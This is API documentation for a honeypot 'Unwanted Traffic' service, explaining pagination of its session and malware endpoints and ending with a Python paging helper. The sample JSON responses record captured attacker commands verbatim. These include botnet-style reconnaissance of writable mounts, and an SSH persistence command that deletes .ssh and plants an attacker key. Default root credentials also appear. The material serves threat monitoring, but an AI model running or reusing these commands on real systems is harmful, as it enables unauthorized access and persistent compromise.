The Unwanted Traffic API supports pagination for endpoints that return large data sets, specifically /sessions, /attempts and /malware. This page explains how to use the pagination parameters to navigate results efficiently.
Pagination is controlled by two query parameters:
- limit: The maximum number of records to return in a single response (default: 50, maximum: 100).
- offset: The number of records to skip before returning results (default: 0).
These parameters let you retrieve data in manageable chunks, especially when combined with filters (see Filters).
Paginated endpoints include a pagination object in the response, which provides metadata about the result set:
- limit: The number of records returned in the current response.
- offset: The starting index of the returned records.
- totalRecords: The total number of records matching the query (after filters are applied).
The data array contains the actual records, up to the specified limit.
To retrieve the first 2 sessions where the destination IP is "192.168.0.96":
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=0"
Example Response:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 2,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "818fa72b39c1",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20777,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "818fa72b39c1",
"session_id": 2,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61254,
"timestamp": "Sun, 23 Feb 2025 00:00:02 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 9607
}
}
To retrieve the next 2 sessions (records 3 and 4):
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=2"
Example Response:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 3,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "9c2d4e8f127a",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.19543,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "9c2d4e8f127a",
"session_id": 3,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61260,
"timestamp": "Sun, 23 Feb 2025 00:00:03 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 4,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "3f9a2c6b850d",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20219,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "3f9a2c6b850d",
"session_id": 4,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61266,
"timestamp": "Sun, 23 Feb 2025 00:00:04 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 9607
}
}
To retrieve the second page of malware records (records 3 and 4) where the malware type is "redir" and the source IP is "192.168.1.100":
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/malware?malware-type=redir&src-ip=192.168.1.100&limit=2&offset=2"
Example Response:
{
"status": "success",
"data": [
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 3,
"malware_session": "7b4f9a3c1e2d",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 6.23456,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "7b4f9a3c1e2d",
"session_id": 789,
"src_asn": 142002,
"src_country": "India",
"src_ip": "192.168.1.100",
"src_port": 52345,
"timestamp": "Sun, 23 Feb 2025 03:15:22 GMT",
"traffic_type": "attack"
}
},
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 4,
"malware_session": "9d2c5b7e4f1a",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 4.98765,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "9d2c5b7e4f1a",
"session_id": 823,
"src_asn": 396982,
"src_country": "Taiwan",
"src_ip": "192.168.1.100",
"src_port": 58912,
"timestamp": "Sun, 23 Feb 2025 03:20:47 GMT",
"traffic_type": "attack"
}
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 678
}
}
To use pagination effectively:
- Use limit to control the number of records per request, keeping it reasonable (for example, 10–50) to balance performance and usability.
- Increment offset by limit to retrieve subsequent pages (for example, offset=0, offset=50, offset=100 for limit=50).
- Use totalRecords to determine how many pages are available (ceil(totalRecords / limit)).
- Avoid excessively large limit values to prevent performance issues; the API caps limit at 100.
- Handle empty data arrays gracefully when offset exceeds the number of available records.
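The paging loop described above (advance offset by limit, stop on totalRecords or on an empty data array), as an added Python example that is not part of the original documentation. The names http_fetch, iter_records, page_count and fake_fetch are hypothetical; fake_fetch is a constructed stand-in for the API so the loop can run offline.

```python
import json
import math
import urllib.parse
import urllib.request

BASE_URL = "https://defrancisco.us/unwanted-traffic"  # from the curl examples
MAX_LIMIT = 100  # documented cap on limit

def http_fetch(endpoint, params, api_key):
    """Perform one GET request and return the decoded JSON body."""
    url = f"{BASE_URL}/{endpoint}?{urllib.parse.urlencode(params)}"
    req = urllib.request.Request(
        url, headers={"X-API-Key": api_key, "Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)

def iter_records(endpoint, filters, limit=50, fetch=None, api_key="YOUR_API_KEY"):
    """Yield every record matching `filters`, requesting one page at a time."""
    if not 1 <= limit <= MAX_LIMIT:
        raise ValueError(f"limit must be between 1 and {MAX_LIMIT}")
    fetch = fetch or (lambda ep, p: http_fetch(ep, p, api_key))
    offset = 0
    while True:
        page = fetch(endpoint, {**filters, "limit": limit, "offset": offset})
        if page.get("status") != "success":
            raise RuntimeError(f"API returned status {page.get('status')!r}")
        data = page["data"]
        if not data:  # empty page: offset is past the last available record
            return
        yield from data
        offset += limit
        # totalRecords is re-read on every page in case records are added
        # while paging (assumption: the data set is not frozen).
        if offset >= page["pagination"]["totalRecords"]:
            return

def page_count(total_records, limit):
    """Number of pages available: ceil(totalRecords / limit)."""
    return math.ceil(total_records / limit)

def fake_fetch(endpoint, params):
    """Constructed stand-in for the API, serving 5 fake session records."""
    records = [{"session_id": i} for i in range(1, 6)]
    start, size = params["offset"], params["limit"]
    return {"status": "success", "data": records[start:start + size],
            "pagination": {"limit": size, "offset": start,
                           "totalRecords": len(records)}}
```

Call iter_records without the fetch argument to query the live API with a real key; with the sample responses above, page_count(9607, 2) gives the number of requests the /sessions query would need.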